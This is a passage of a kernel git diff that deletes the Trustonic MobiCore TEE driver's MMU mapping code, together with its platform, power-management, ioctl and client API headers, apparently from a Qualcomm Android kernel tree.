-- if (mmu_table->l1_table.page)
-- free_page(mmu_table->l1_table.page);
--}
--
--/*
-- * Create a MMU table for a buffer or trustlet.
-- */ --static inline int map_buffer(struct task_struct *task, const void *data, -- unsigned int length, struct tbase_mmu *mmu_table) --{ -- const void *reader = (const void *)((uintptr_t)data & PAGE_MASK); -- struct page **pages; /* Same as above, conveniently typed */ -- unsigned long pages_page; /* Page to contain the page pointers */ -- size_t chunk; -- unsigned long total_pages_nr; -- int l1_entries_max; -- int ret = 0; -- -- /* Check that we have enough space to map data */ -- mmu_table->length = length; -- mmu_table->offset = (uintptr_t)data & ~PAGE_MASK; -- total_pages_nr = PAGE_ALIGN(mmu_table->offset + length) / PAGE_SIZE; -- if (g_ctx.f_mem_ext) -- l1_entries_max = L1_ENTRIES_MAX; -- else -- l1_entries_max = 1; -- -- if (total_pages_nr > (l1_entries_max * L2_ENTRIES_MAX)) { -- dev_err(g_ctx.mcd, "data mapping exceeds %d pages", -- l1_entries_max * L2_ENTRIES_MAX); -- return -EINVAL; -- } -- -- /* Get number of L2 tables needed */ -- mmu_table->l2_tables_nr = (total_pages_nr + L2_ENTRIES_MAX - 1) / -- L2_ENTRIES_MAX; -- dev_dbg(g_ctx.mcd, "total_pages_nr %lu l2_tables_nr %zu", -- total_pages_nr, mmu_table->l2_tables_nr); -- -- /* Get a page to store page pointers */ -- pages_page = get_zeroed_page(GFP_KERNEL); -- if (!pages_page) -- return -ENOMEM; -- -- pages = (struct page **)pages_page; -- -- /* Allocate a page for the L1 table */ -- if (mmu_table->l2_tables_nr > 1) { -- tbase_pte_t *pte; -- -- mmu_table->l1_table.page = get_zeroed_page(GFP_KERNEL); -- mmu_table->l1_l2_table.page = get_zeroed_page(GFP_KERNEL); -- if (!mmu_table->l1_table.page || !mmu_table->l1_l2_table.page) { -- ret = -ENOMEM; -- goto end; -- } -- -- /* Map it */ -- pte = &mmu_table->l1_l2_table.ptes[0]; -- *pte = virt_to_phys(mmu_table->l1_table.pages_phys); -- *pte |= pte_flags; -- } -- -- for (chunk = 0; chunk < mmu_table->l2_tables_nr; chunk++) { -- unsigned long pages_nr, i; -- tbase_pte_t *pte; -- struct page **page_ptr; -- -- /* Size to map for this chunk */ -- if (chunk == 
(mmu_table->l2_tables_nr - 1)) -- pages_nr = ((total_pages_nr - 1) % L2_ENTRIES_MAX) + 1; -- else -- pages_nr = L2_ENTRIES_MAX; -- -- /* Allocate a page for the MMU descriptor */ -- mmu_table->l2_tables[chunk].page = get_zeroed_page(GFP_KERNEL); -- if (!mmu_table->l2_tables[chunk].page) { -- ret = -ENOMEM; -- goto end; -- } -- -- /* Add page address to L1 table if needed */ -- if (mmu_table->l1_table.page) -- mmu_table->l1_table.pages_phys[chunk] = -- virt_to_phys(mmu_table->l2_tables[chunk].ptes); -- -- /* Get pages */ -- if (task) { -- long gup_ret; -- -- /* Buffer was allocated in user space */ -- down_read(&task->mm->mmap_sem); -- gup_ret = get_user_pages(task, task->mm, -- (uintptr_t)reader, pages_nr, -- 1, 0, pages, 0); -- reader += pages_nr * PAGE_SIZE; -- up_read(&task->mm->mmap_sem); -- if (gup_ret < 0) { -- ret = gup_ret; -- dev_err(g_ctx.mcd, -- "failed to get user pages: %d", ret); -- goto end; -- } -- -- /* check if we could lock all pages. */ -- if (gup_ret != pages_nr) { -- dev_err(g_ctx.mcd, -- "get_user_pages() failed, ret: %ld", -- gup_ret); -- release_pages(pages, gup_ret, 0); -- ret = -ENOMEM; -- goto end; -- } -- -- mmu_table->user = true; -- } else if (is_vmalloc_addr(data)) { -- /* Buffer vmalloc'ed in kernel space */ -- page_ptr = &pages[0]; -- for (i = 0; i < pages_nr; i++) { -- struct page *page = vmalloc_to_page(reader); -- -- if (!page) { -- dev_err(g_ctx.mcd, -- "failed to map address"); -- ret = -EINVAL; -- goto end; -- } -- -- *page_ptr++ = page; -- reader += PAGE_SIZE; -- } -- } else { -- /* Buffer kmalloc'ed in kernel space */ -- struct page *page = virt_to_page(reader); -- -- reader += pages_nr * PAGE_SIZE; -- page_ptr = &pages[0]; -- for (i = 0; i < pages_nr; i++) -- *page_ptr++ = page++; -- } -- -- /* Create MMU Table entries */ -- page_ptr = &pages[0]; -- pte = &mmu_table->l2_tables[chunk].ptes[0]; -- for (i = 0; i < pages_nr; i++, page_ptr++, pte++) { -- /* -- * Create MMU table entry, see ARM MMU docu for details -- * about 
flags stored in the lowest 12 bits. As a side -- * reference, the Article "ARM's multiply-mapped memory -- * mess" found in the collection at -- * http://lwn.net/Articles/409032/ is also worth reading. -- */ -- unsigned long phys = page_to_phys(*page_ptr); --#if defined CONFIG_ARM64 && !defined CONFIG_TRUSTONIC_TEE_LPAE -- if (phys & 0xffffffff00000000) { -- dev_err(g_ctx.mcd, -- "Pointer too big for non-LPAE: 0x%16lx", -- phys); -- ret = -EFAULT; -- goto end; -- } --#endif -- *pte = phys; -- *pte |= pte_flags; -- } -- } -- --end: -- if (ret) -- free_all_pages(mmu_table); -- -- free_page(pages_page); -- return ret; --} -- --static inline void unmap_buffer(struct tbase_mmu *mmu_table) --{ -- int t; -- -- dev_dbg(g_ctx.mcd, "clear MMU table, virt %p", mmu_table); -- if (!mmu_table->user) -- goto end; -- -- /* Release all locked user space pages */ -- for (t = 0; t < mmu_table->l2_tables_nr; t++) { -- tbase_pte_t *pte = mmu_table->l2_tables[t].ptes; -- int i; -- -- for (i = 0; i < L2_ENTRIES_MAX; i++, pte++) { -- struct page *page; -- -- /* If not all entries are used, unused ones are 0 */ -- if (!*pte) -- break; -- -- /* pte_page() cannot return NULL */ -- page = pte_page(*pte); -- dev_dbg(g_ctx.mcd, "MMU entry %d: 0x%llx, virt %p", -- i, (u64)*pte, page); -- -- page_cache_release(page); -- } -- } -- --end: -- free_all_pages(mmu_table); --} -- --/* -- * Delete a MMU table. -- */ --void tbase_mmu_delete(struct tbase_mmu *mmu) --{ -- if (WARN(!mmu, "NULL mmu pointer given")) -- return; -- -- unmap_buffer(mmu); -- MCDRV_DBG("freed mmu %p: %s len %u off %u table %lx type L%d", -- mmu, mmu->user ? "user" : "kernel", mmu->length, mmu->offset, -- (uintptr_t)(mmu->l1_table.page ? mmu->l1_l2_table.ptes : -- mmu->l2_tables[0].ptes), -- mmu->l1_table.page ? 1 : 2); -- kfree(mmu); --} -- --/* -- * Allocate MMU table and map buffer into it. -- * That is, create respective table entries. 
-- */ --struct tbase_mmu *tbase_mmu_create(struct task_struct *task, -- const void *addr, -- unsigned int length) --{ -- struct tbase_mmu *mmu; -- int ret; -- -- /* Check input arguments */ -- if (WARN(!addr, "data address is NULL")) -- return ERR_PTR(-EINVAL); -- -- if (WARN(!length, "data length is 0")) -- return ERR_PTR(-EINVAL); -- -- /* Allocate the struct */ -- mmu = kmalloc(sizeof(*mmu), GFP_KERNEL | __GFP_ZERO); -- if (!mmu) -- return ERR_PTR(-ENOMEM); -- -- /* Create the MMU mapping for the data */ -- ret = map_buffer(task, addr, length, mmu); -- if (ret) { -- kfree(mmu); -- return ERR_PTR(ret); -- } -- -- MCDRV_DBG("created mmu %p: %s addr %p len %u off %u table %lx type L%d", -- mmu, mmu->user ? "user" : "kernel", addr, mmu->length, -- mmu->offset, -- (uintptr_t)(mmu->l1_table.page ? mmu->l1_l2_table.ptes : -- mmu->l2_tables[0].ptes), -- mmu->l1_table.page ? 1 : 2); -- return mmu; --} -- --void tbase_mmu_buffer(const struct tbase_mmu *mmu, struct mcp_buffer_map *map) --{ -- if (mmu->l1_table.page) { -- map->phys_addr = virt_to_phys(mmu->l1_l2_table.ptes); -- map->type = WSM_L1; -- } else { -- map->phys_addr = virt_to_phys(mmu->l2_tables[0].ptes); -- map->type = WSM_L2; -- } -- -- map->secure_va = 0; -- map->offset = mmu->offset; -- map->length = mmu->length; --} -- --int tbase_mmu_info(const struct tbase_mmu *mmu, struct kasnprintf_buf *buf) --{ -- return kasnprintf(buf, -- "\t\t\tmmu %p: %s len %u off %u table %lx type L%d\n", -- mmu, mmu->user ? "user" : "kernel", mmu->length, -- mmu->offset, -- (uintptr_t)(mmu->l1_table.page ? -- mmu->l1_l2_table.ptes : mmu->l2_tables[0].ptes), -- mmu->l1_table.page ? 1 : 2); --} -diff --git a/drivers/gud/MobiCoreDriver/mmu.h b/drivers/gud/MobiCoreDriver/mmu.h -deleted file mode 100644 -index 09efea480bef8..0000000000000 ---- a/drivers/gud/MobiCoreDriver/mmu.h -+++ /dev/null -@@ -1,44 +0,0 @@ --/* -- * Copyright (c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. 
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _TBASE_MEM_H_
--#define _TBASE_MEM_H_
--
--struct tbase_mmu;
--struct mcp_buffer_map;
--
--/*
-- * Allocate MMU table and map buffer into it.
-- * That is, create respective table entries.
-- */
--struct tbase_mmu *tbase_mmu_create(struct task_struct *task,
-- const void *wsm_buffer,
-- unsigned int wsm_len);
--
--/*
-- * Delete a used MMU table.
-- */
--void tbase_mmu_delete(struct tbase_mmu *mmu);
--
--/*
-- * Fill in buffer info for MMU table.
-- */
--void tbase_mmu_buffer(const struct tbase_mmu *mmu, struct mcp_buffer_map *map);
--
--/*
-- * Add info to debug buffer.
-- */
--int tbase_mmu_info(const struct tbase_mmu *mmu, struct kasnprintf_buf *buf);
--
--#endif /* _TBASE_MEM_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/platform.h b/drivers/gud/MobiCoreDriver/platform.h
-deleted file mode 100644
-index f9c801450f64e..0000000000000
---- a/drivers/gud/MobiCoreDriver/platform.h
-+++ /dev/null
-@@ -1,150 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_PLATFORM_H_
--#define _MC_PLATFORM_H_
--
--/* MobiCore Interrupt for Qualcomm (DT IRQ has priority if present) */
--#define MC_INTR_SSIQ 280
--
--/* Use SMC for fastcalls */
--#define MC_SMC_FASTCALL
--
--#include
--
--/*--------------- Implementation -------------- */
--#if defined(CONFIG_ARCH_APQ8084) || defined(CONFIG_ARCH_MSM8916) || \
-- defined(CONFIG_ARCH_MSM8994) || defined(CONFIG_ARCH_MSM8909) || \
-- defined(CONFIG_ARCH_MSM8996)
--
--#include
--
--#if defined(CONFIG_ARM64) || defined(CONFIG_ARCH_MSM8916)
--
-- #include
-- #include
-- #include
-- #include
-- #include
-- #include
--
-- #define SCM_MOBIOS_FNID(s, c) (((((s) & 0xFF) << 8) | ((c) & 0xFF)) \
-- | 0x33000000)
--
-- #define TZ_EXECUTIVE_EXT_ID_PARAM_ID \
-- TZ_SYSCALL_CREATE_PARAM_ID_4( \
-- TZ_SYSCALL_PARAM_TYPE_BUF_RW, \
-- TZ_SYSCALL_PARAM_TYPE_VAL, \
-- TZ_SYSCALL_PARAM_TYPE_BUF_RW, \
-- TZ_SYSCALL_PARAM_TYPE_VAL)
--
--#endif
--
--#else
--#include
--#endif
--
--/* from following file */
--#define SCM_SVC_MOBICORE 250
--#define SCM_CMD_MOBICORE 1
--
--static inline int smc_fastcall(void *fc_generic, size_t size)
--{
--#if defined(CONFIG_ARCH_APQ8084) || defined(CONFIG_ARCH_MSM8916) || \
-- defined(CONFIG_ARCH_MSM8994) || defined(CONFIG_ARCH_MSM8996)
-- if (is_scm_armv8()) {
-- struct scm_desc desc = {0};
-- int ret;
-- void *scm_buf = NULL;
--
-- scm_buf = kzalloc(PAGE_ALIGN(size), GFP_KERNEL);
-- if (!scm_buf)
-- return -ENOMEM;
-- memcpy(scm_buf, fc_generic, size);
-- dmac_flush_range(scm_buf, scm_buf + size);
--
-- desc.arginfo = TZ_EXECUTIVE_EXT_ID_PARAM_ID;
-- desc.args[0] = virt_to_phys(scm_buf);
-- desc.args[1] = (u32)size;
-- desc.args[2] = virt_to_phys(scm_buf);
-- desc.args[3] = (u32)size;
--
-- ret = scm_call2(
-- SCM_MOBIOS_FNID(SCM_SVC_MOBICORE, SCM_CMD_MOBICORE),
-- &desc);
--
-- dmac_flush_range(scm_buf, scm_buf + size);
--
-- memcpy(fc_generic, scm_buf, size);
-- kfree(scm_buf);
-- return ret;
-- }
--#endif
--
-- return scm_call(SCM_SVC_MOBICORE,
SCM_CMD_MOBICORE,
-- fc_generic, size,
-- fc_generic, size);
--}
--
--/* Fastcall value should be the one for armv7, even if on armv8,
-- * as long as the __aarch32__ flag is not activated in SW.
-- * But for 8996, architecture is armv8 with __aarch32__ in Sw.
-- */
--#if !defined(CONFIG_ARCH_MSM8996)
--#define MC_ARMV7_FC
--#endif
--
--#if defined(CONFIG_ARCH_MSM8996)
--#define CONFIG_TRUSTONIC_TEE_LPAE
--#endif
--
--/*
-- * Perform crypto clock enable/disable
-- * of clocks
-- * "bus_clk"
-- * "core_clk"
-- * "iface_clk"
-- */
--#if (!defined(CONFIG_ARCH_MSM8960) && !defined(CONFIG_ARCH_MSM8994)) || \
-- defined(CONFIG_ARCH_MSM8996)
--#define MC_CRYPTO_CLOCK_MANAGEMENT
--#endif
--
--/*
-- * Perform clock enable/disable for clock "core_clk_src"
-- */
--#if defined(CONFIG_ARCH_MSM8916) || defined(CONFIG_ARCH_MSM8909) || \
-- defined(CONFIG_ARCH_MSM8996)
--#define MC_DEVICE_PROPNAME "qcom,mcd"
--#if defined(MC_CRYPTO_CLOCK_MANAGEMENT)
--#define MC_CLOCK_CORESRC_PROPNAME "qcom,ce-opp-freq"
--#define MC_CLOCK_CORESRC_DEFAULTRATE 100000000
--#endif /* MC_CRYPTO_CLOCK_MANAGEMENT */
--#endif
--
--
--#if !defined(CONFIG_ARCH_MSM8996)
--/* uid/gid behave like old kernels but with new types */
--/* This flag does not exist on 8996 3.10 kernel version */
--#if !defined(CONFIG_UIDGID_STRICT_TYPE_CHECKS)
--#define MC_UIDGID_OLDSTYLE
--#endif
--/* Fastcall value should be the one for armv7, even if on armv8,
-- * as long as the __aarch32__ flag is not activated in SW.
-- * But for 8996, architecture is armv8 with __aarch32__ in Sw.
-- */
--#define MC_ARMV7_FC
--#endif /* not CONFIG_ARCH_MSM8996 */
--
--#endif /* _MC_PLATFORM_H_ */
--
-diff --git a/drivers/gud/MobiCoreDriver/pm.c b/drivers/gud/MobiCoreDriver/pm.c
-deleted file mode 100644
-index 98310f73dfeab..0000000000000
---- a/drivers/gud/MobiCoreDriver/pm.c
-+++ /dev/null
-@@ -1,62 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include
--#include
--#include
--#include
--
--#include "public/mc_linux.h"
--
--#include "platform.h" /* MC_PM_RUNTIME */
--#include "debug.h"
--#include "scheduler.h" /* SWd suspend/resume commands */
--#include "pm.h"
--
--#ifdef MC_PM_RUNTIME
--static struct pm_context {
-- struct notifier_block pm_notifier;
--} pm_ctx;
--
--static int mc_suspend_notifier(struct notifier_block *nb, unsigned long event,
-- void *dummy)
--{
-- switch (event) {
-- case PM_SUSPEND_PREPARE:
-- return mc_scheduler_suspend();
-- case PM_POST_SUSPEND:
-- return mc_scheduler_resume();
-- }
--
-- return 0;
--}
--
--
--/* CPI todo: inconsistent handling of ret in below 2 functions */
--int mc_pm_start(void)
--{
-- int ret = 0;
--
-- pm_ctx.pm_notifier.notifier_call = mc_suspend_notifier;
-- ret = register_pm_notifier(&pm_ctx.pm_notifier);
-- MCDRV_DBG_VERBOSE("done, ret = %d", ret);
--
-- return ret;
--}
--
--void mc_pm_stop(void)
--{
-- unregister_pm_notifier(&pm_ctx.pm_notifier);
--}
--
--#endif /* MC_PM_RUNTIME */
-diff --git a/drivers/gud/MobiCoreDriver/pm.h b/drivers/gud/MobiCoreDriver/pm.h
-deleted file mode 100644
-index 999599a70b1ab..0000000000000
---- a/drivers/gud/MobiCoreDriver/pm.h
-+++ /dev/null
-@@ -1,36 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_PM_H_
--#define _MC_PM_H_
--
--#include "platform.h" /* MC_PM_RUNTIME */
--
--#ifdef MC_PM_RUNTIME
--/* Initialize Power Management */
--int mc_pm_start(void);
--/* Free all Power Management resources*/
--void mc_pm_stop(void);
--#else
--static inline int mc_pm_start(void)
--{
-- return 0;
--}
--
--static inline void mc_pm_stop(void)
--{
--}
--#endif
--
--#endif /* _MC_PM_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/public/mc_admin.h b/drivers/gud/MobiCoreDriver/public/mc_admin.h
-deleted file mode 100644
-index 3a4078dd6fc30..0000000000000
---- a/drivers/gud/MobiCoreDriver/public/mc_admin.h
-+++ /dev/null
-@@ -1,80 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef __MC_ADMIN_IOCTL_H__
--#define __MC_ADMIN_IOCTL_H__
--
--#ifdef __cplusplus
--extern "C" {
--#endif
--
--#define MC_ADMIN_DEVNODE "mobicore"
--
--/* Driver/daemon commands */
--enum {
-- /* Command 0 is reserved */
-- MC_DRV_GET_ROOT_CONTAINER = 1,
-- MC_DRV_GET_SP_CONTAINER = 2,
-- MC_DRV_GET_TRUSTLET_CONTAINER = 3,
-- MC_DRV_GET_TRUSTLET = 4,
-- MC_DRV_SIGNAL_CRASH = 5,
--};
--
--/* MobiCore IOCTL magic number */
--#define MC_IOC_MAGIC 'M'
--
--struct mc_admin_request {
-- uint32_t request_id; /* Unique request identifier */
-- uint32_t command; /* Command to daemon */
-- struct mc_uuid_t uuid; /* UUID of trustlet, if relevant */
-- uint32_t is_gp; /* Whether trustlet is GP */
-- uint32_t spid; /* SPID of trustlet, if relevant */
--};
--
--struct mc_admin_response {
-- uint32_t request_id; /* Unique request identifier */
-- uint32_t error_no; /* Errno from daemon */
-- uint32_t spid; /* SPID of trustlet, if relevant */
-- uint32_t service_type; /* Type of trustlet being returned */
-- uint32_t length; /* Length of data to get */
-- /* Any data follows */
--};
--
--struct mc_admin_driver_info {
-- /* Version, and something else..*/
-- uint32_t drv_version;
-- uint32_t initial_cmd_id;
--};
--
--struct mc_admin_load_info {
-- uint32_t spid; /* SPID of trustlet, if relevant */
-- uint64_t address; /* Address of the data */
-- uint32_t length; /* Length of data to get */
--};
--
--#define MC_ADMIN_IO_GET_DRIVER_REQUEST \
-- _IOR(MC_IOC_MAGIC, 0, struct mc_admin_request)
--#define MC_ADMIN_IO_GET_INFO \
-- _IOR(MC_IOC_MAGIC, 1, struct mc_admin_driver_info)
--#define MC_ADMIN_IO_LOAD_DRIVER \
-- _IOW(MC_IOC_MAGIC, 2, struct mc_admin_load_info)
--#define MC_ADMIN_IO_LOAD_TOKEN \
-- _IOW(MC_IOC_MAGIC, 3, struct mc_admin_load_info)
--#define MC_ADMIN_IO_LOAD_CHECK \
-- _IOW(MC_IOC_MAGIC, 4, struct mc_admin_load_info)
--
--#ifdef __cplusplus
--}
--#endif
--#endif /* __MC_ADMIN_IOCTL_H__ */
-diff --git a/drivers/gud/MobiCoreDriver/public/mc_linux.h
b/drivers/gud/MobiCoreDriver/public/mc_linux.h
-deleted file mode 100644
-index 2368653f8890d..0000000000000
---- a/drivers/gud/MobiCoreDriver/public/mc_linux.h
-+++ /dev/null
-@@ -1,170 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_LINUX_H_
--#define _MC_LINUX_H_
--
--#define MCDRVMODULEAPI_VERSION_MAJOR 2
--#define MCDRVMODULEAPI_VERSION_MINOR 1
--
--#ifndef __KERNEL__
--#include
--#endif
--
--#define MC_USER_DEVNODE "mobicore-user"
--
--/** Maximum length of MobiCore product ID string. */
--#define MC_PRODUCT_ID_LEN 64
--
--/** Number of buffers that can be mapped at once */
--#define MC_MAP_MAX 4
--
--/*
-- * Universally Unique Identifier (UUID) according to ISO/IEC 11578.
-- */
--struct mc_uuid_t {
-- uint8_t value[16]; /* Value of the UUID. */
--};
--
--/*
-- * GP TA login types.
-- */
--enum mc_login_type {
-- TEEC_LOGIN_PUBLIC = 0,
-- TEEC_LOGIN_USER,
-- TEEC_LOGIN_GROUP,
-- TEEC_LOGIN_APPLICATION = 4,
-- TEEC_LOGIN_USER_APPLICATION,
-- TEEC_LOGIN_GROUP_APPLICATION,
--};
--
--/*
-- * GP TA identity structure.
-- */
--struct mc_identity {
-- enum mc_login_type login_type;
-- union {
-- uint8_t login_data[16];
-- gid_t gid; /* Requested group id */
-- struct {
-- uid_t euid;
-- uid_t ruid;
-- } uid;
-- };
--};
--
--/*
-- * Data exchange structure of the MC_IO_OPEN_SESSION ioctl command.
-- */
--struct mc_ioctl_open_sess {
-- struct mc_uuid_t uuid; /* trustlet uuid */
-- uint32_t is_gp_uuid; /* uuid is for GP TA */
-- uint32_t sid; /* session id (out) */
-- uint64_t tci; /* tci buffer pointer */
-- uint32_t tcilen; /* tci length */
-- struct mc_identity identity; /* GP TA identity */
--};
--
--/*
-- * Data exchange structure of the MC_IO_OPEN_TRUSTLET ioctl command.
-- */
--struct mc_ioctl_open_trustlet {
-- uint32_t sid; /* session id (out) */
-- uint32_t spid; /* trustlet spid */
-- uint64_t buffer; /* trustlet binary pointer */
-- uint32_t tlen; /* binary length */
-- uint64_t tci; /* tci buffer pointer */
-- uint32_t tcilen; /* tci length */
--};
--
--/*
-- * Data exchange structure of the MC_IO_WAIT ioctl command.
-- */
--struct mc_ioctl_wait {
-- uint32_t sid; /* session id (in) */
-- int32_t timeout; /* notification timeout */
--};
--
--/*
-- * Data exchange structure of the MC_IO_ALLOC ioctl command.
-- */
--struct mc_ioctl_alloc {
-- uint32_t len; /* buffer length */
-- uint32_t handle; /* user handle for the buffer (out) */
--};
--
--/*
-- * Buffer mapping incoming and outgoing information.
-- */
--struct mc_ioctl_buffer {
-- uint64_t va; /* user space address of buffer */
-- uint32_t len; /* buffer length */
-- uint64_t sva; /* SWd virt address of buffer (out) */
--};
--
--/*
-- * Data exchange structure of the MC_IO_MAP and MC_IO_UNMAP ioctl commands.
-- */
--struct mc_ioctl_map {
-- uint32_t sid; /* session id */
-- struct mc_ioctl_buffer bufs[MC_MAP_MAX];/* buffers info */
--};
--
--/*
-- * Data exchange structure of the MC_IO_ERR ioctl command.
-- */
--struct mc_ioctl_geterr {
-- uint32_t sid; /* session id */
-- int32_t value; /* error value (out) */
--};
--
--/*
-- * Global MobiCore Version Information.
-- */
--struct mc_version_info {
-- char product_id[MC_PRODUCT_ID_LEN]; /** Product ID string */
-- uint32_t version_mci; /** Mobicore Control Interface */
-- uint32_t version_so; /** Secure Objects */
-- uint32_t version_mclf; /** MobiCore Load Format */
-- uint32_t version_container; /** MobiCore Container Format */
-- uint32_t version_mc_config; /** MobiCore Config. Block Format */
-- uint32_t version_tl_api; /** MobiCore Trustlet API */
-- uint32_t version_dr_api; /** MobiCore Driver API */
-- uint32_t version_cmp; /** Content Management Protocol */
--};
--
--/*
-- * defines for the ioctl mobicore driver module function call from user space.
-- */
--/* MobiCore IOCTL magic number */
--#define MC_IOC_MAGIC 'M'
--
--/*
-- * Implement corresponding functions from user api
-- */
--#define MC_IO_OPEN_SESSION \
-- _IOWR(MC_IOC_MAGIC, 0, struct mc_ioctl_open_sess)
--#define MC_IO_OPEN_TRUSTLET \
-- _IOWR(MC_IOC_MAGIC, 1, struct mc_ioctl_open_trustlet)
--#define MC_IO_CLOSE_SESSION _IO(MC_IOC_MAGIC, 2)
--#define MC_IO_NOTIFY _IO(MC_IOC_MAGIC, 3)
--#define MC_IO_WAIT _IOW(MC_IOC_MAGIC, 4, struct mc_ioctl_wait)
--#define MC_IO_MAP _IOWR(MC_IOC_MAGIC, 5, struct mc_ioctl_map)
--#define MC_IO_UNMAP _IOW(MC_IOC_MAGIC, 6, struct mc_ioctl_map)
--#define MC_IO_ERR _IOWR(MC_IOC_MAGIC, 7, struct mc_ioctl_geterr)
--#define MC_IO_FREEZE _IO(MC_IOC_MAGIC, 8)
--#define MC_IO_VERSION _IOR(MC_IOC_MAGIC, 9, struct mc_version_info)
--#define MC_IO_DR_VERSION _IOR(MC_IOC_MAGIC, 10, uint32_t)
--
--#endif /* _MC_LINUX_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/public/mc_linux_api.h b/drivers/gud/MobiCoreDriver/public/mc_linux_api.h
-deleted file mode 100644
-index 211bc2682b754..0000000000000
---- a/drivers/gud/MobiCoreDriver/public/mc_linux_api.h
-+++ /dev/null
-@@ -1,28 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_LINUX_API_H_
--#define _MC_LINUX_API_H_
--
--/*
-- * Switch tbase active core to core_num, defined as linux
-- * core id
-- */
--int mc_switch_core(uint32_t core_num);
--
--/*
-- * Return tbase active core as Linux core id
-- */
--uint32_t mc_active_core(void);
--
--#endif /* _MC_LINUX_API_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/public/mobicore_driver_api.h b/drivers/gud/MobiCoreDriver/public/mobicore_driver_api.h
-deleted file mode 100644
-index 005099532d73a..0000000000000
---- a/drivers/gud/MobiCoreDriver/public/mobicore_driver_api.h
-+++ /dev/null
-@@ -1,450 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MOBICORE_DRIVER_API_H_
--#define _MOBICORE_DRIVER_API_H_
--
--#include "mc_linux.h"
--
--#define __MC_CLIENT_LIB_API
--
--/*
-- * Return values of MobiCore driver functions.
-- */
--enum mc_result {
-- /* Function call succeeded. */
-- MC_DRV_OK = 0,
-- /* No notification available. */
-- MC_DRV_NO_NOTIFICATION = 1,
-- /* Error during notification on communication level.
*/
-- MC_DRV_ERR_NOTIFICATION = 2,
-- /* Function not implemented. */
-- MC_DRV_ERR_NOT_IMPLEMENTED = 3,
-- /* No more resources available. */
-- MC_DRV_ERR_OUT_OF_RESOURCES = 4,
-- /* Driver initialization failed. */
-- MC_DRV_ERR_INIT = 5,
-- /* Unknown error. */
-- MC_DRV_ERR_UNKNOWN = 6,
-- /* The specified device is unknown. */
-- MC_DRV_ERR_UNKNOWN_DEVICE = 7,
-- /* The specified session is unknown.*/
-- MC_DRV_ERR_UNKNOWN_SESSION = 8,
-- /* The specified operation is not allowed. */
-- MC_DRV_ERR_INVALID_OPERATION = 9,
-- /* The response header from the MC is invalid. */
-- MC_DRV_ERR_INVALID_RESPONSE = 10,
-- /* Function call timed out. */
-- MC_DRV_ERR_TIMEOUT = 11,
-- /* Can not allocate additional memory. */
-- MC_DRV_ERR_NO_FREE_MEMORY = 12,
-- /* Free memory failed. */
-- MC_DRV_ERR_FREE_MEMORY_FAILED = 13,
-- /* Still some open sessions pending. */
-- MC_DRV_ERR_SESSION_PENDING = 14,
-- /* MC daemon not reachable */
-- MC_DRV_ERR_DAEMON_UNREACHABLE = 15,
